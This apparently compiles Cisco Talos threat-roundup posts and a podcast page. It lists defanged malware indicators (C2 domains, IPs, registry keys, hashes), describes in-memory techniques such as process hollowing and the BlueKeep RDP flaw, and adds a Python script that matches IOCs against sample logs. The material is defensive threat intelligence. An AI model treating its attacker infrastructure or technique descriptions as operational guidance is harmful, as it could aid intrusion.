ThreatGrid\n\n[](<https://1.bp.blogspot.com/-0VtSwWcmMpY/XiIxkxPIA6I/AAAAAAAADJU/OKID_zPptEIITjGHeUT0_Z3jsrr_pGjrgCLcBGAsYHQ/s1600/2bd3451c8410d9d8d34470eb2d49c7061584ef1bebb31cadd4dc10e3e7ad31b0_tg.png>)\n\n \n\n\n#### Malware\n\n[](<https://1.bp.blogspot.com/-51RmBbmX5dw/XiIxpg16sLI/AAAAAAAADJY/z31ZelV58-kop45RA8Q2DM_09yaLuE2_gCLcBGAsYHQ/s1600/04ce16123c1db27009dfd8a2546810c881a22b6eeed4697d64cb44af2e69e75d_malware.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Razy-7532659-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\7E3975E4EF230D7D9195 ` | 4 \n`<HKCU>\\SOFTWARE\\7E3975E4EF230D7D9195 \nValue Name: 7E3975E4EF230D7D9195 ` | 4 \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 2 \n`<HKCU>\\SOFTWARE\\FECBD0A484C99B705CF7099E6CE11887 ` | 2 
\n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fecbd0a484c99b705cf7099e6ce11887 ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fecbd0a484c99b705cf7099e6ce11887 ` | 2 \n`<HKCU>\\SOFTWARE\\FECBD0A484C99B705CF7099E6CE11887 \nValue Name: [kl] ` | 2 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\AUTOUPDATE \nValue Name: LastSyncTime ` | 1 \nMutexes | Occurrences \n---|--- \n`fca-1de3ff845109` | 4 \n`jicaltapntot` | 3 \n`gfgdgdfdgfggfdgfdgbfdbgdfbgdfbgfdbgdfbgdfbgdfbgdfbgdfgbdfgbdfgdfbdgfbgdfbgdfbgdbfgbdfdgbfgbfdvbvdgfdgfbvgdbfvdgfbvdgfvb` | 2 \n`fecbd0a484c99b705cf7099e6ce11887` | 2 \n`022-1b90e6b10b98` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`51[.]15[.]40[.]85` | 17 \n`177[.]75[.]44[.]41` | 3 \n`177[.]75[.]44[.]147` | 2 \n`169[.]254[.]255[.]255` | 1 \n`72[.]21[.]81[.]240` | 1 \n`104[.]20[.]68[.]143` | 1 \n`104[.]20[.]67[.]143` | 1 \n`109[.]202[.]107[.]15` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`rentry[.]co` | 17 \n`jhonjhon4842[.]ddns[.]net` | 5 \n`pastebin[.]com` | 2 \n`ctldl[.]windowsupdate[.]com` | 1 \n`noregisterdomain[.]zapto[.]org` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\explorer.exe` | 3 \n`%TEMP%\\explorer.exe` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\fecbd0a484c99b705cf7099e6ce11887.exe` | 2 \n \n#### File Hashes\n\n` 04c3f0070bc08bafddfeb011497eb893c37f63397b535dcedee9e5ac89e246c3 0e754a806b2813874c47332e98a8c118bd1e33508b44ff0081ac36a48814d769 120924a5852db8a4333cf74fc1f067f51a70a996de994bc4ce727ff1377f6023 16ca75f09433409d790695af612f4ee560c265f3f084b6dc04bcbebff2ebe964 3a1a6f80ea8aa66ce456ab0cd452ad38e12b3c904432fedb5a0242c987f84c81 4ca2e3f2272455e38269d69d20dbb16c1572befe8b81a92c4acdae93341549d2 5c4dee777eb540663373b08b31b5d69d52fe9108317b21b697ea2487a2b8621d 747b1a101bb3a43a6c0b58fb8a50d8ac9777ea704911e7df27edf8c81ead883e 7f85c722bf97008aafd593730ccf252318ffb8ad00645aa0e13eab7d76c96687 8953d845fe687b2a8c5e92a0a7b2aa9dcb5c61dd271983194ef300476faee3de 95384877ed6e9a9e726ff1d18bd0fd137160e4943e0bebe59c7f7a8bfd3b25d8 b58590a3a09129a3a1e55195b0f1a39bb278a4ee1c21257aa2d74b425f09e649 c679ac377cc06ef337c78bcd3882b4e0ad5023d9649c1e37296f98252573bd57 d2e84fc71ada0566834f9dcd871b927c3e52603b73cf2bc0d923fbba79fc205f db7f08e2ae8fdb796d8420ef16ef539f2c8fe24ddabadf5a46cc7148b5c50e8a ded370384b5abe048734193ae8281852d2f68cf93cdec658bb0047ed7314c9a6 efa4ffb921031f5c2cd960f2d24e56140dd2c0d549e2a7b2ea69e4ab0cb47dae f24917e59deff96fe4107de88d80815c5aa45d3e7aa711ad772ea031bcfdcc1d f5c8e5e5303aedd99923c610e3b0ecd34095fdff10ae120d1be6648c5bdc3e89 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### 
AMP\n\n[](<https://1.bp.blogspot.com/-eU-xaKLp84Y/XiIx70iv7jI/AAAAAAAADJk/JLJuW1qVwIMcHQmwwI8Dmyo6aHbDjc91QCLcBGAsYHQ/s1600/db7f08e2ae8fdb796d8420ef16ef539f2c8fe24ddabadf5a46cc7148b5c50e8a_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-G1FNrSD8osM/XiIx_qDj2WI/AAAAAAAADJo/5rM-Q2nRDZM8VSESeSTrCL6QXpV-oLXhwCLcBGAsYHQ/s1600/db7f08e2ae8fdb796d8420ef16ef539f2c8fe24ddabadf5a46cc7148b5c50e8a_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-rnF_8yn3aCE/XiIyEeb9XGI/AAAAAAAADJs/F9_v9eKTP8QxmNq33fOqfyiWlNBHlkEBACLcBGAsYHQ/s1600/0e754a806b2813874c47332e98a8c118bd1e33508b44ff0081ac36a48814d769_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Dridex-7532883-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: trkcore ` | 12 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM \nValue Name: DisableTaskMgr ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\ACTION CENTER\\CHECKS\\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0 \nValue Name: CheckSetting ` | 12 \nMutexes | Occurrences \n---|--- \n`bxHV8AirRi` | 1 \n`nN6zSKd5De` | 1 \n`1aGmpK2Fpc` | 1 \n`7hIVwzEnv1` | 1 \n`E6Q6j6YTV8` | 1 \n`Irun61Xn7d` | 1 \n`JLSADdwil0` | 1 \n`NPXzzJejTH` | 1 \n`WWN630213P` | 1 \n`XPF1tOcJMb` | 1 \n`2WpU6TmEPW` | 1 \n`3ZJhaY3yr9` | 1 \n`5he85143TO` | 1 \n`KjY7CSFqPz` | 1 \n`R9uXS0pi9F` | 1 \n`TV4I4E35W8` | 1 \n`eDiPKSpzC6` | 1 \n`yebXkefg8w` | 1 \n`CCbi4gfgIs` | 1 \n`OuaMk6vUKi` | 1 \n`RiFp6vyARh` | 1 \n`W6ArquGVYc` | 1 \n`cLgrRVqAOx` | 1 \n`rw74rlool5` | 1 \n`vxudb0VN9b` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`172[.]217[.]11[.]46` | 12 \n`104[.]20[.]67[.]143` | 7 \n`104[.]20[.]68[.]143` | 5 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`pastebin[.]com` | 12 \n`www[.]4zjjwywndb[.]com` | 1 \n`www[.]wyek9gljwv[.]com` | 1 \n`www[.]dhpydj8zow[.]com` | 1 \n`www[.]xy5xc1pa3f[.]com` | 1 \n`www[.]dw4kr1pwbg[.]com` | 1 \n`www[.]bz11msxwlf[.]com` | 1 \n`www[.]65vxrzb8us[.]com` | 1 \n`www[.]qiht7hodpf[.]com` | 1 \n`www[.]gfuhlqwl2q[.]com` | 1 \n`www[.]xdctdxp8w3[.]com` | 1 \n`www[.]hfhfl9jloc[.]com` | 1 \n`www[.]gvkkyn2d5c[.]com` | 1 \n`www[.]womizyhbm9[.]com` | 1 \n`www[.]zboz6h96hz[.]com` | 1 \n`www[.]ssgj6cpx0k[.]com` | 1 \n`www[.]rpy91utwrm[.]com` | 1 \n`www[.]qeqvtkjksw[.]com` | 1 \n`www[.]0ac8n2n5zb[.]com` | 1 \n`www[.]eagzu4rlpm[.]com` | 1 \n`www[.]0rfabtbv2r[.]com` | 1 \n`www[.]abzze96jtg[.]com` | 1 \n`www[.]wfajyuswse[.]com` | 1 \n`www[.]d4ktsdbuhr[.]com` | 1 \n`www[.]ep2iu65g3l[.]com` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 05afedd0b76f574373f858b854958c473482fcc6fa9736f0d447094605ad2102 0a3079b8c4963b26e74760337da6cb0b1a6c532cc524f4d0aae6dab1d52f7d75 0a4e162d4a11aa91ead63995af22c410b422b8b5af2038d4ef95d454c1d380e1 0f4f25d12a2729552a348fb33cd7374fbd5ce3bc53c8da873f3aa5026a7290ca 33991dbeb097cb0937ae9ea049418089b3437e7f4ef23cbcf26b906b1ab39d5b 79d11b3634c5a3dc51442b4e8cdf88d921f9d46273a55ac20cd1fa7d0d51c11d 919119268cb2b13ae638c6015822352d899cc39ea10959a86634c8bd2fc8912b 940eaff21163abfe8be6301e561e30a27f23800cb8bfe4a5df9a5ff7dbfb1d4f a31fdd57bc317cd8f6c4df0c6f75bcd25999d36f7cc665da9018672dfe55061c b5d15bb5d2a6bde41040d4b9d63e8cc1cfddf8669f5c1389c2aba584328dc27b e45c5802e6091e4602519853d81ad08f45969d574cfa3d1e36a6af8bd0daaaf7 f3475d70597f4f77ab542f79c295c120094f9dc35bddb706bfb80b1e8787a061 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### 
AMP

[](<https://1.bp.blogspot.com/-SZ-VrEa38rw/XiIySm0SjyI/AAAAAAAADJ0/zfyXN9AUVHccvfIbFMN6ASwxZtphlhoUgCLcBGAsYHQ/s1600/05afedd0b76f574373f858b854958c473482fcc6fa9736f0d447094605ad2102_amp.png>)

#### ThreatGrid

[](<https://1.bp.blogspot.com/-GpMbeK_HK8I/XiIyX4bvVCI/AAAAAAAADJ8/ru4-fDcdqLs8-8ZKOzBAqX2YM9hV9woBQCLcBGAsYHQ/s1600/05afedd0b76f574373f858b854958c473482fcc6fa9736f0d447094605ad2102_tg.png>)

* * *

## Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps defend endpoints from the in-memory attacks commonly used by obfuscated malware and exploits. These techniques are built to slip past signature-based scanning of files on disk; AMP blocks them by watching process memory and behavior instead, which is also what lets it stop exploitation of vulnerabilities for which no signature yet exists, including zero-days.

CVE-2019-0708 detected - (22771)

An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a use-after-free (a form of heap memory corruption) in the kernel-mode Remote Desktop Protocol (RDP) driver that can be triggered by sending a specially crafted RDP request. Because the bug is reachable before authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction. Enabling Network Level Authentication (NLA) on the RDP listener forces a successful logon before the vulnerable code path is reached and so blocks unauthenticated exploitation, but it is a mitigation, not a fix; only the patch removes the bug.

Process hollowing detected - (394)

Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a loader process is started and its obfuscated or encrypted payload is unpacked into memory. The loader then creates a legitimate-looking child process in a suspended state, unmaps the child's original executable image from its address space, writes the unpacked payload in its place, points the child's main thread at the payload's entry point and resumes it. On disk and in the process list the child looks like the benign binary it was started from, while the code that actually runs came from the parent.

Excessively long PowerShell command detected - (304)

A PowerShell command with a very long command-line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present by default on every supported version of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats; encoded (`-EncodedCommand`) or heavily obfuscated one-liners tend to be far longer than anything an administrator types by hand, which is what this length heuristic keys on.

Kovter injection detected - (181)

A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless: the malicious payload is stored inside the Windows registry and injected directly into memory using PowerShell, so there is no executable on disk for a file scanner to find. It can detect and report the use of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.

Dealply adware detected - (147)

DealPly is adware that claims to improve the user's online shopping experience. It is often bundled into otherwise legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into web pages. Adware has also been known to download and install malware.

Gamarue malware detected - (141)

Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.

Installcore adware detected - (125)

InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.

Corebot malware detected - (22)

Corebot is a Trojan with many capabilities found in other prominent families. It features a plugin system that lets it load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as intercepting and modifying browser communications to steal data, especially data related to banking.

Fusion adware detected - (13)

Fusion (or FusionPlayer) is an adware family that displays unwanted advertising in the form of pop-ups or by injecting into browsers and altering advertisements on web pages. Adware is known to sometimes download and install malware.

IcedID malware detected - (10)

IcedID is a banking Trojan. It uses both web browser injection and browser redirection to steal banking and other financial credentials and data. The features and sophistication of IcedID demonstrate the malware author's knowledge and technical skill for this kind of fraud, and suggest the authors have previous experience creating banking Trojans. IcedID has been observed being installed by Emotet or Ursnif, so systems infected with IcedID should also be scanned for additional malware infections.

Published 2020-01-17 on the Cisco Talos blog as "Threat Roundup for January 10 to January 17" (id TALOSBLOG:340B43701E5CA96D8B4491CD801FE010; CVEs: CVE-2019-0708; CVSS 10.0, AV:N/AC:L/Au:N/C:C/I:C/A:C): http://feedproxy.google.com/~r/feedburner/Talos/~3/U32MSyxPJMs/threat-roundup-0110-0117.html

* * *

[](<https://1.bp.blogspot.com/-5SjstCoUMTQ/XO7VLvIo2nI/AAAAAAAAAUg/OgofNweHYSIqJZCVL27F5fwRtWgcnXLUACLcBGAs/s1600/BWT_EP54_JoelBubble.jpg>)

Beers with Talos (BWT) Podcast Ep. #54 is now available.
Download this episode and subscribe to Beers with Talos: [iTunes](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>), [Google Play](<https://play.google.com/music/listen?u=0#/ps/Ikcmodkhrjtblk5yks47s5uqbca>), [Stitcher](<https://www.stitcher.com/podcast/talos/beers-with-talos>).

If iTunes and Google Play aren't your thing, click [here](<http://www.talosintelligence.com/podcast>).

Recorded May 24, 2019 — There is another Blue(X) to talk about and guess what? YES, YOU STILL NEED TO PATCH. We talk about RDP, the source of this vulnerability and whether or not exploits exist for it (hint: they do). There is a quick look back at last year on the anniversary of VPNFilter, and we also tackle zero-days again through the lens of Project Zero's timeline of zero-days found in the wild.

Also, Craig hasn't seen the end of "John Wick 3" yet, so feel free to tweet him spoilers. If you are in San Diego for Cisco Live two weeks from now, come find us to see a live recording of the podcast!

### The timeline:

 * 01:00 — Roundtable: The Dark Times, it's not what you THOT, and deducing a new baby's name
 * 13:00 — Happy birthday VPNFilter, I didn't get you anything and I'm not sorry.
 * 18:00 — RDP and BlueKeep: Really Do Patch. Stop, go do it. Blah blah blah, not listening. Go patch.
 * 29:00 — Zero-days: The amount of time a patch has been available for any exploit, and/or since machines have made an attempt on Craig's life.
 * 38:30 — Project Zero timeline of zero-days found in the wild
 * 47:30 — Parting shots, closing thoughts

### Some other links:

 * [MS Guidance for CVE-2019-0708](<https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708>)
 * [Project Zero sheet](<https://docs.google.com/spreadsheets/u/1/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/htmlview#>)

Featuring: [Craig Williams](<https://twitter.com/security_craig>) (@Security_Craig), [Joel Esler](<https://twitter.com/JoelEsler>) (@JoelEsler), [Matt Olney](<https://twitter.com/kpyke>) (@kpyke) and [Nigel Houghton](<https://twitter.com/EnglishLFC>) (@EnglishLFC).

Hosted by [Mitch Neff](<https://twitter.com/MitchNeff>) (@MitchNeff).

[Subscribe via iTunes](<http://cs.co/talositunes>) (and leave a review!)

Check out the [Talos Threat Research Blog](<http://cs.co/talosresearch>)

Subscribe to the [Threat Source newsletter](<http://cs.co/talosupdate>)

Follow [Talos on Twitter](<http://cs.co/talostwitter>)

Give us your feedback and suggestions for topics: [beerswithtalos@cisco.com](<mailto:beerswithtalos@cisco.com>)

Source: Talos, "Beers with Talos Ep. #54: Patch after listening, RDP and wild 0-days", published 2019-05-29, tagged CVE-2019-0708. <http://feedproxy.google.com/~r/feedburner/Talos/~3/TuVwJYeiLF8/beers-with-talos-ep-54-patch-after.html>

* * *

## Talos Threat Roundup, Feb. 14 to Feb. 21, 2020

[Threat Roundup banner](<https://1.bp.blogspot.com/-YY2FQl9WGXA/XURYSq-inGI/AAAAAAAAACc/Ko8Q3jzMHrs2tIOdnt-yO6QVWhNtZBrPwCLcBGAs/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg>)

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Feb. 14 and Feb. 21. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, [Snort.org](<https://www.snort.org/>), or [ClamAV.net](<https://www.clamav.net/>).

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found [here](<https://alln-extcloud-storage.cisco.com/blogs/1/2020/02/tru.json_.txt>) that includes the complete list of file hashes, as well as all other IOCs from this post.
As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicate maliciousness.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
---|---|---
Win.Dropper.Gandcrab-7586670-0 | Dropper | Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension ".GDCB," ".CRAB" or ".KRAB". Gandcrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft.
Win.Packed.Mikey-7586709-0 | Packed | Mikey is a trojan that installs itself on the system, collects information and communicates with a C2 server, potentially exfiltrating sensitive information. This threat can also receive additional commands and perform other malicious actions on the system, such as installing additional malware upon request.
Win.Malware.Qakbot-7586710-1 | Malware | Qakbot, aka Qbot, has been around since at least 2008. Qbot primarily targets sensitive information like banking credentials but can also steal FTP credentials and spread across a network using SMB.
Win.Malware.Razy-7588195-0 | Malware | Razy is oftentimes a generic detection name for a Windows trojan. It collects sensitive information from the infected host and encrypts the data, then sends it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting and creating a value in the registry for persistence.
Win.Packed.Generickdz-7586813-0 | Packed | This is a BobSoft Delphi application that wraps malware. In the current campaign, the HawkEye spyware is installed. The malware uses process hollowing to hide from detection and achieves persistence across reboots by leveraging an Autostart key in the Windows registry.
Win.Packed.Tofsee-7586819-1 | Packed | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Malware.Nymaim-7586870-1 | Malware | Nymaim is malware that can be used to deliver ransomware and other malicious payloads. It uses a domain-generation algorithm to generate potential command and control (C2) domains to connect to additional payloads.
Win.Ransomware.Remcos-7586925-1 | Ransomware | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Malware.Autoit-7586956-0 | Malware | This signature covers malware leveraging the well-known AutoIT automation tool, widely used by system administrators. AutoIT exposes a rich scripting language that allows adversaries to write fully functional malicious software. This family will install itself on the system and contact a C2 server to receive additional instructions or download follow-on payloads.
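The IOC tables in the breakdown that follows use defanged notation (`66[.]171[.]248[.]178`, `gandcrab[.]bit`), mix single addresses with CIDR ranges such as `67[.]195[.]228[.]110/31`, and list benign infrastructure (external-IP lookup services, the Windows NCSI probe `www[.]msftncsi[.]com`) right beside C2 names, which is exactly why the roundup warns that a single IOC proves nothing. The script below is an added example, not Talos code: it parses rows in the roundup's `` `value` | count `` format, refangs them, matches them against constructed DNS/proxy log lines, and separates "strong" hits (attacker infrastructure) from "context" hits (benign services the samples also touched). The indicator values are copied from the Gandcrab, Mikey and Razy tables; the log lines, host names, family labels and the benign-context list are assumptions made for the demo.

```python
"""Triage defanged IOCs from a Talos-style roundup against DNS/proxy logs.

Added example for this page (not Talos code). Indicator values come from the
roundup's Gandcrab, Mikey and Razy tables; the log lines, host names and the
benign-context list are constructed for the demo.
"""
from __future__ import annotations

import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass

# Roundup rows look like: `gandcrab[.]bit` | 46
ROW_RE = re.compile(r"`([^`]+)`\s*\|\s*(\d+)")
DEFANG_RE = re.compile(r"\[\.\]")
KV_RE = re.compile(r"(\w+)=(\S+)")

# Names the samples contacted that are not attacker infrastructure: public
# "what is my IP" services, the Windows NCSI probe, and a PTR lookup of the
# sandbox gateway. Hits here are context, never evidence on their own.
BENIGN_CONTEXT = {
    "ipv4bot.whatismyipaddress.com", "www.myexternalip.com", "api.db-ip.com",
    "ipinfo.io", "ip-api.com", "www.msftncsi.com", "1.1.168.192.in-addr.arpa",
}


@dataclass(frozen=True)
class Ioc:
    value: str        # refanged domain, IP or CIDR
    family: str       # roundup signature it came from
    occurrences: int  # how many sandboxed samples produced it


def refang(value: str) -> str:
    return DEFANG_RE.sub(".", value.strip()).lower()


def parse_ioc_table(text: str, family: str) -> list[Ioc]:
    """Parse '`value` | count' rows copied from a roundup table."""
    return [Ioc(refang(v), family, int(n)) for v, n in ROW_RE.findall(text)]


def as_network(value: str):
    """Return an ip_network for an IP or CIDR string, None for anything else."""
    try:
        return ipaddress.ip_network(value, strict=False)
    except ValueError:
        return None


def matches(observed: str, ioc: Ioc) -> bool:
    """Address-in-network for IP/CIDR IOCs, exact-or-subdomain match for names."""
    net = as_network(ioc.value)
    if net is not None:
        try:
            return ipaddress.ip_address(observed) in net
        except ValueError:
            return False
    obs = observed.lower().rstrip(".")
    return obs == ioc.value or obs.endswith("." + ioc.value)


def scan(log_lines: list[str], iocs: list[Ioc]) -> dict:
    """Group hits per host into 'strong' (attacker infra) and 'context' lists."""
    report = defaultdict(lambda: {"strong": [], "context": []})
    for line in log_lines:
        fields = dict(KV_RE.findall(line))
        observed = fields.get("query") or fields.get("dst")  # DNS name or proxy dst IP
        if not observed:
            continue
        for ioc in iocs:
            if matches(observed, ioc):
                bucket = "context" if ioc.value in BENIGN_CONTEXT else "strong"
                report[fields.get("host", "?")][bucket].append((observed, ioc.family))
    return dict(report)


def suspicious_hosts(report: dict) -> list[str]:
    """Hosts with at least one strong hit; context-only hosts are left alone."""
    return sorted(h for h, hits in report.items() if hits["strong"])


# Rows copied from the roundup's tables; the family labels are mine.
GANDCRAB_ROWS = """
`66[.]171[.]248[.]178` | 46
`ipv4bot[.]whatismyipaddress[.]com` | 46
`1[.]1[.]168[.]192[.]in-addr[.]arpa` | 46
`dns1[.]soprodns[.]ru` | 46
`nomoreransom[.]bit` | 46
`gandcrab[.]bit` | 46
"""
MIKEY_ROWS = """
`www[.]myexternalip[.]com` | 4
`nemty10[.]hk` | 4
`api[.]db-ip[.]com` | 4
`67[.]195[.]228[.]110/31` | 1
`loveumail[.]com` | 1
"""
RAZY_ROWS = """
`www[.]msftncsi[.]com` | 40
`ligue1[.]shop` | 2
"""
IOCS = (parse_ioc_table(GANDCRAB_ROWS, "Gandcrab")
        + parse_ioc_table(MIKEY_ROWS, "Mikey/Nemty")
        + parse_ioc_table(RAZY_ROWS, "Razy"))

# Constructed log lines, not real traffic: 'query' from a DNS resolver,
# 'dst' from a proxy/firewall, key=value style.
SAMPLE_LOG = """\
2020-02-18T09:12:01Z host=WS-042 query=www.msftncsi.com
2020-02-18T09:12:03Z host=WS-042 query=ipv4bot.whatismyipaddress.com
2020-02-18T09:12:04Z host=WS-042 query=gandcrab.bit
2020-02-18T09:12:05Z host=WS-042 dst=66.171.248.178
2020-02-18T09:15:10Z host=WS-017 query=www.msftncsi.com
2020-02-18T09:16:22Z host=WS-099 query=nemty10.hk
2020-02-18T09:16:40Z host=WS-099 dst=67.195.228.111
2020-02-18T09:20:00Z host=WS-003 query=mail.loveumail.com
""".splitlines()

if __name__ == "__main__":
    result = scan(SAMPLE_LOG, IOCS)
    for host in sorted(result):
        print(f"{host}: strong={result[host]['strong']} context={result[host]['context']}")
    print("investigate:", suspicious_hosts(result))
```

Two design points worth keeping when adapting this: the occurrence count in a roundup table measures how many sandboxed samples produced the indicator, not how suspicious it is (`www[.]msftncsi[.]com` scores 40 in the Razy table because every Windows box queries it), so weighting by that column is the wrong instinct; and CIDR entries such as `/31` have to be handled as networks rather than string-compared, or the neighbouring address slips through.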
* * *

## Threat Breakdown

### Win.Dropper.Gandcrab-7586670-0

#### Indicators of Compromise

 * IOCs collected from dynamic analysis of 48 samples

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE` with Value Name `eegsjfdkqvr`, `ythjobixtnr`, `yeelxnznvki`, `umwdlwwsaaz`, `piveskqvesb`, `ispyjcnalox`, `pkmkandzsro`, `ejmsgaummxr`, `hujteforzto`, `jcrillrkibx`, `hrsalhxnejd`, `dctzafzqnkl`, `cuzlcuudbwx`, `sxzpjghkvsd`, `wriuvpwacau`, `duivayvsjqx`, `xbxpanidwht`, `uethoblisdu`, `sarblkidckc`, `sujhhdohjjr`, `yfvdvhnadpu` | 1 each
`<HKCU>\SOFTWARE\MICROSOFT\OFAGAS` | 1
`<HKCU>\SOFTWARE\MICROSOFT\OFAGAS` Value Name: `Ydcyuxos` | 1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN` Value Name: `Diokydyb` | 1
`<HKCU>\SOFTWARE\MICROSOFT\SYSTEM` Value Name: `Panda` | 1

Mutexes | Occurrences
---|---
`Global\pc_group=WORKGROUP&ransom_id=4a6a799098b68e3c` | 46
`GLOBAL\{<random GUID>}` | 1

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`66[.]171[.]248[.]178` | 46

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`ipv4bot[.]whatismyipaddress[.]com` | 46
`1[.]1[.]168[.]192[.]in-addr[.]arpa` | 46
`dns1[.]soprodns[.]ru` | 46
`nomoreransom[.]bit` | 46
`gandcrab[.]bit` | 46
`nomoreransom[.]coin` | 46
`bon[.]aungercote[.]org` | 1
`ver[.]sceinsheru[.]org` | 1

Files and or directories created | Occurrences
---|---
`%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\a18ca4003deb042bbee7a40f15e1970b_d19ab989-a35f-4710-83df-7b2db7efe7c5` | 46
`%APPDATA%\Microsoft\<random, matching '[a-z]{6}'>.exe` | 46
`%APPDATA%\Enylf\vyku.exe` | 1
`%APPDATA%\Guibc` | 1
`%APPDATA%\Guibc\hyka.irp` | 1
`%APPDATA%\Gyun` | 1
`%APPDATA%\Gyun\vaxac.qae` | 1
`%APPDATA%\Nozuo` | 1
`%APPDATA%\Nozuo\quzui.exe` | 1

#### File Hashes

```
099c47434a97a9bcd0c6bb5f0291bb69d70dd05ab002fa83487d63b997b90f96
09eeafacfe79c4fc87c45dab72ce88aa1e234e668e2535e209beaa4a8181610f
0d293a8759d4bae6aa5d8587108a508f6d40efb449dbc239800efebb7a2bf2d7
10ae8e44b98f0255ba8e6d819d804e8379336500f3e27a14bb5b8ea72a07eb80
134e8947ef2f684d816c6c1da588fba3f9f0c08c24533adc02cbcb93d9e1494a
145bcff3aca6ba04f241e0d5ced04e2781c8a0f225ebf51dcddfb238fdbc63ea
18213dfc3c25be525312f6ff70e4ea8861233bc562d1442a501a0ae7c7bd93f4
187591cccfe3eb0c7bea183e03a735be581f704866b2bf2f82c2f57c759f5fde
1a2e00ce828da6130592178bd3b0bf47f2b3edefafffe7e6371622aae1ceb9af
